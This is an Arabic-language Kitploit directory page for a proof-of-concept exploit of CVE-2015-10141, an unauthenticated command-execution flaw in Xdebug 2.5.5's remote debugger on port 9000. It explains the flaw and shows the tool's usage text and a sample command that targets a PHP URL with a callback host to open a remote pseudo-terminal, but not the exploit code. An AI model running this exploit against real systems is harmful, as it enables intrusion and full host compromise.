Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2015-10141 — استغلال إثبات المفهوم (POC) لـ CVE-2015-10141 | Kitploit
أدوات/GitHubGitHub/d3ext/cve-2015-10141
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةأداة الوصول عن بعد
GitHubd3ext/cve-2015-10141

CVE-2015-10141

استغلال إثبات المفهوم (POC) لـ CVE-2015-10141

عرض المستودع
319منذ سنة واحدةتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2015-10141

root@kitploit:~
# Exploit Title: xdebug Unauthenticated Command Execution
# Exploit Author: D3Ext
# Vendor Homepage: https://xdebug.org/
# Sofware Link: https://pecl.php.net/package/xdebug/2.5.5/windows
# Version: 2.5.5
# Tested on: Kali Linux 2025
# CVE: CVE-2015-10141

شرح

توجد ثغرة حقن أوامر على مستوى نظام التشغيل غير مصادَق عليها في إصدارات Xdebug 2.5.5 وما قبلها، وهو امتداد لتصحيح أخطاء PHP. عند تفعيل التصحيح عن بُعد، يستمع Xdebug على المنفذ 9000 ويقبل أوامر بروتوكول المصحح دون أي مصادقة. يمكن للمهاجم إرسال أمر eval مخصص عبر هذه الواجهة لتنفيذ كود PHP عشوائي، قد يستدعي دوالًا على مستوى النظام مثل system() أو passthru(). يؤدي ذلك إلى اختراق كامل للمضيف بصلاحيات مستخدم خادم الويب.

الاستخدام

root@kitploit:~
usage: CVE-2015-10141.py [-h] -u URL -l LHOST

CVE-2015-10141 - xdebug v2.5.5 RCE Exploit

options:
  -h, --help         show this help message and exit
  -u, --url URL      URL of the target
  -l, --lhost LHOST  LHOST to trigger the RCE

ما عليك سوى تشغيل الأداة وتزويدها برابط صحيح لملف PHP مثل index.php مع عنوان المضيف المحلي. بعدها ستحاول الأداة إنشاء طرفية زائفة (pseudo-terminal) تتيح لك تنفيذ الأوامر عن بُعد.

root@kitploit:~
python3 exploit.py -u http://10.10.10.83/index.php -l 10.10.16.3

ضع في اعتبارك أنه في بعض الحالات لن يظهر المخرج إطلاقًا وسترى فقط السطر الأول من الأمر المنفَّذ؛ هذه ليست مشكلة في السكربت، بل إن الثغرة تعمل بهذه الطريقة)

المراجع

root@kitploit:~
https://github.com/advisories/GHSA-267w-63f8-m896
https://www.exploit-db.com/exploits/44568
https://www.rapid7.com/db/modules/exploit/unix/http/xdebug_unauth_exec/
https://nvd.nist.gov/vuln/detail/CVE-2015-10141
https://www.wiz.io/vulnerability-database/cve/cve-2015-10141
https://feedly.com/cve/CVE-2015-10141
https://www.tenable.com/plugins/nessus/112210

الترخيص

هذا المشروع مرخّص بموجب رخصة MIT

حقوق النشر © 2025، D3Ext

تنزيل الأداة